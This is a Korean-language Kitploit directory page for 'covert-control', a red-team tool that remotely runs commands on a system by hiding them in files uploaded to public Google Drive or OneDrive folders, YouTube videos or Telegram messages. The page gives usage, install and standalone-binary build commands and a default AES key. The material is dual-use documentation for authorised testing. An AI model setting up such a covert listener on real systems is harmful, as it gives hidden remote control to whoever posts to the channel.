Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
covert-control — Google Drive, OneDrive 및 Youtube를 은밀 채널로 사용 - Google Drive, OneDrive, Youtube 또는 Telegram에 파일을 업로드하여 시스템을 원격으로 제어 | Kitploit
도구/GitHubGitHub/ricardojoserf/covert-control
Encryption/Decryption ToolsData ExfiltrationPost-ExploitationCommand and ControlRed Teaming
GitHubricardojoserf/covert-control

covert-control

Google Drive, OneDrive 및 Youtube를 은밀 채널로 사용 - Google Drive, OneDrive, Youtube 또는 Telegram에 파일을 업로드하여 시스템을 원격으로 제어

저장소 보기
7184년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

covert-control

파일을 Google Drive, OneDrive, Youtube 또는 Telegram에 업로드하여 시스템을 원격으로 제어합니다. Python을 사용하여 파일과 리스너를 생성합니다. 텍스트 파일, 이미지, 오디오 또는 비디오를 생성할 수 있으며, 명령은 평문 또는 AES로 암호화하여 포함할 수 있습니다.

  • covert-googledrive.py - Google Drive의 공개 폴더에 파일을 업로드하여 시스템을 제어합니다.

  • covert-onedrive.py - OneDrive의 공개 폴더에 파일을 업로드하여 시스템을 제어합니다.

  • covert-youtube.py - Youtube에 동영상을 업로드하여 시스템을 제어합니다 (covert-tube에서 업데이트됨).

  • covert-telegram.py - Telegram 봇을 사용하여 시스템을 제어합니다.

업로드할 파일 생성

test_files 폴더에서 예제 파일을 찾거나 generate_file.py로 새 파일을 생성할 수 있습니다:

root@kitploit:~
python3 generate_file.py -t TYPE [-o OUTPUTFILE] [-c COMMAND] [-e]
  • -t (--type) [필수]: 파일 유형: "text", "image", "audio" 또는 "video".

  • -o (--outputfile) [선택 사항]: 출력 파일.

  • -c (--command) [선택 사항]: 실행할 명령어.

  • -e (--encrypted) [선택 사항]: 이 플래그를 추가하면 명령어를 AES로 암호화합니다.

예시:

root@kitploit:~
python3 generate_file.py -t text  -c "whoami" -o text.txt
python3 generate_file.py -t text  -c "whoami" -o text_encrypted.txt -e
python3 generate_file.py -t audio -c "whoami" -o audio.wav
python3 generate_file.py -t audio -c "whoami" -o audio_encrypted.wav -e
python3 generate_file.py -t image -c "whoami" -o image.png
python3 generate_file.py -t image -c "whoami" -o image_encrypted.png -e
python3 generate_file.py -t video -c "whoami" -o video.avi
python3 generate_file.py -t video -c "whoami" -o video_encrypted.avi -e

설정

공통 설정 값:

  • data_type (선택 사항. 기본값: "text"):

특정 설정 값:

  • googledrive_folder: 모니터링할 공개 Google Drive 폴더의 URL (covert-googledrive.py 용).

  • onedrive_folder: 모니터링할 공개 OneDrive 폴더의 URL (covert-onedrive.py 용).

  • youtube_channel_id: 모니터링할 Youtube 채널의 ID. 여기에서 가져올 수 있습니다 (covert-youtube.py 용).

  • youtube_api_key: 여기에서 애플리케이션을 생성하고 키를 생성하여 API 키를 가져옵니다 (covert-youtube.py 용).

  • telegram_token: 봇 토큰. BotFather를 사용하여 생성합니다. "/newbot"을 입력한 후 봇 이름(예: "botname")과 "-bot"으로 끝나는 봇 사용자 이름(예: "somethingrandombot")을 보냅니다 (covert-telegram.py 용).

  • telegram_username: 특정 Telegram 사용자로부터 수신된 명령만 실행하도록 사용자 이름을 지정합니다 ("@" 제외).


Google Drive

텍스트 파일, 이미지, 오디오, 비디오를 암호화되지 않거나 AES로 암호화하여 업로드함으로써 명령을 실행할 수 있습니다. 선택적 입력 인자는 공개 폴더 URL이며, config.py에서도 설정할 수 있습니다:

root@kitploit:~
python3 covert-googledrive.py [FOLDER_URL]

리스너는 기본적으로 300초마다 Google Drive 폴더를 확인합니다 (config.py에서 업데이트 가능). 이 경우 비디오 "video.avi"가 업로드되며, 명령어는 비디오의 QR 코드에 포함됩니다:

img1

폴더에 새 파일이 업로드된 것을 감지하면 다운로드, 처리 후 명령이 실행됩니다:

img2


Onedrive

텍스트 파일, 이미지, 오디오, 비디오를 암호화되지 않거나 AES로 암호화하여 업로드함으로써 명령을 실행할 수 있습니다. 선택적 입력 인자는 공개 폴더 URL이며, config.py에서도 설정할 수 있습니다:

root@kitploit:~
python3 covert-onedrive.py [FOLDER_URL]

리스너는 기본적으로 300초마다 OneDrive 폴더를 확인합니다 (config.py에서 업데이트 가능). 이 경우 오디오 "audio_encrypted.wav"가 업로드되며, 명령어는 AES로 암호화되어 있습니다:

img3

폴더에 새 파일이 업로드된 것을 감지하면 다운로드, 처리 후 명령이 실행됩니다:

img4

참고: 폴더에서 파일을 삭제하지 않아야 작동합니다. 삭제할 경우 새 폴더를 만들어야 합니다. 파일을 삭제해도 작동하도록 구현할 수는 있지만, 많은 요청이 필요하고 은밀성이 떨어집니다.


Youtube

비디오를 암호화되지 않거나 AES로 암호화하여 업로드함으로써 명령을 실행할 수 있습니다. 선택적 입력 인자는 모니터링할 Youtube 채널 ID와 API 키이며, config.py에서도 설정할 수 있습니다:

root@kitploit:~
python3 covert-youtube.py [CHANNEL_ID] [API_KEY]

리스너는 기본적으로 300초마다 Youtube 채널을 확인합니다 (config.py에서 업데이트 가능). 먼저 비디오를 업로드합니다:

img5

채널에 새 동영상이 있는지 확인한 후 다운로드, 처리 후 명령이 실행됩니다:

img6


Telegram

Telegram 봇을 사용하여 시스템을 원격으로 제어합니다. 이 옵션은 파일 업로드를 지원하지 않지만, 명령을 평문("/cmd") 또는 AES로 암호화하여("/encrypted") 보낼 수 있습니다. 첫 번째 선택적 입력 인자는 봇 토큰이며 config.py에서도 설정할 수 있습니다. 두 번째 인자는 봇에 명령을 보낼 수 있는 단일 Telegram 사용자를 구성하는 데 사용됩니다 ("@" 제외):

root@kitploit:~
python3 covert-telegram.py [BOT_TOKEN] [TELEGRAM_USER]

리스너는 채팅의 명령을 확인하고 출력을 표시합니다:

root@kitploit:~
/cmd CLEARTEXT_COMMAND
/encrypted AES_ENCRYPTED_COMMAND

img7


설치

root@kitploit:~
sudo apt install libzbar0
pip install bs4 Pillow opencv-python pyqrcode pypng pyzbar youtube_dl pytesseract python-telegram-bot requests argparse pycryptodome
git clone https://github.com/ricardojoserf/covert-control && cd covert-control/

독립 실행형 바이너리 생성

root@kitploit:~
pyinstaller --onefile covert-googledrive.py
pyinstaller --onefile covert-onedrive.py
pyinstaller --onefile covert-telegram.py
pyinstaller --onefile covert-youtube.py
rm -rf build
rm *spec
ls dist/
도구 다운로드
data_type파일 유형암호화사용 가능 대상확장자
text텍스트 파일아니요Google Drive, OneDrive.txt
text_encrypted텍스트 파일예Google Drive, OneDrive.txt
image이미지아니요Google Drive, OneDrive.png
image_encrypted이미지예Google Drive, OneDrive.png
audio오디오아니요Google Drive, OneDrive.wav
audio_encrypted오디오예Google Drive, OneDrive.wav
video비디오아니요Google Drive, OneDrive, Youtube.avi
video_encrypted비디오예Google Drive, OneDrive, Youtube.avi
  • delay_seconds (선택 사항. 기본값: 300): Google Drive 또는 OneDrive 폴더에 새 파일이 업로드되거나 Youtube 채널에 새 동영상이 게시되었는지 확인하는 간격(초).

  • aes_key (선택 사항. 기본값: "covert-control21"): AES 암호화 키.

  • debug (선택 사항. 기본값: True): 리스너에서 메시지와 타임스탬프를 출력할지 여부.